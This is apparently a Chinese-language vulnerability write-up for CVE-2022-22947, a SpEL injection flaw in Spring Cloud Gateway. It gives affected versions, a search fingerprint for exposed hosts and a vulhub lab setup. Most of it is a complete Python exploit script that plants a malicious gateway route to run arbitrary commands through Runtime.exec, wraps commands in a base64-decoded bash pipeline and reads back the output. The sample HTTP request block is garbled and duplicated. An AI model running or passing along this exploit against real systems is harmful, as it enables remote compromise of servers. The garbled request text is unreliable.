遵纪守法
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益
漏洞描述:
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问ActuatorAPI的情况下,将可以利用该漏洞执行任意命令。
漏洞影响:
3.1.0、 3.0.0至3.0.6、 3.0.0之前的版本
案例
app="vmware-SpringBoot-framework"
环境搭建
# 下载包 wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip # 解压包 unzip vulhub-master.zip # 进入vulhub目录,开启漏洞环境 vulhub/spring/CVE-2022-22947 docker-compose up -d #漏洞环境拉取成功后访问 http://ip:8080/漏洞复现
1
POST /actuator/gateway/routes/WeianSec HTTP/1.1 Host: 162.14.69.165:8080 Accept-Encoding: gzip, deflate Accept: ** Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 456 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,**;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: closeexp
#!python3
import requests, json, sys, base64
#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
def rce(url, cmd):
h1 = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Content-Type': 'application/json'
}
data = {
"id": "ee",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec("" + cmd +"").getInputStream()))}"
}
}],
"uri": "http://aaaa.aa",
"order": 0
}
res1 = requests.post('{}/actuator/gateway/routes/ee'.format(url), data = json.dumps(data, ensure_ascii = False), headers = h1, verify = False)#, proxies = proxies)
res2 = requests.post('{}/actuator/gateway/refresh'.format(url), headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',}, verify = False)
res3 = requests.get('{}/actuator/gateway/routes/ee'.format(url), headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',}, verify = False)
print(res3.text)
if __name__ == "__main__":
url = sys.argv[-2]
if url[-1] == '/':
url = url[:-1]
cmd = sys.argv[-1]
cmd = 'bash -c {echo,' + base64.b64encode(cmd.encode()).decode() + '}|{base64,-d}|{bash,-i}'
if not (url.startswith('http://') or url.startswith('https://')):
print('使用: python cve-2022-22947.py url cmd')
sys.exit(1)
rce(url, cmd)
